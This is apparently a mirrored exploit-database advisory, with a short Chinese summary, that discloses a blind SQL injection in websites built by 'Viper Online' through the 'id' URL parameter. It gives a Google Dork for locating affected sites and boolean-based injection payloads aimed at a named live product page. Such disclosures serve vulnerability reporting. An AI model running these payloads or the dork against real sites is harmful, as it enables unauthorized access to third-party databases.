Viper Online被发现存在盲SQL注入漏洞,影响URL中的id参数。攻击者可利用构造特定请求进行攻击。例如,在product.php?id=50' and 1=1--+中添加恶意代码即可触发漏洞。该漏洞由AmirHossein Abdollahi发现,并提供了相应的Google Dork用于识别目标网站。 2025-5-1 18:24:34 Author: cxsecurity.com(查看原文) 阅读量:3 收藏
********************************************************* # Exploit Title: Viper Online - Blind SQL Injection Vulnerability # Date: 2025-05-01 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: intext:"Website by: Viper Online" # Category: WebApps # Tested On: Windows, Firefox ********************************************************* [+] Vulnerable Parameter: `id` in URLs with `.php?id=` ********************************************************* ### Demo: http://reomart.kgpl.com/product.php?id=50' and 1=1--+ http://reomart.kgpl.com/product.php?id=50' and 1=2--+ ********************************************************* [+] Google Dork: intext:"Website by: Viper Online" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh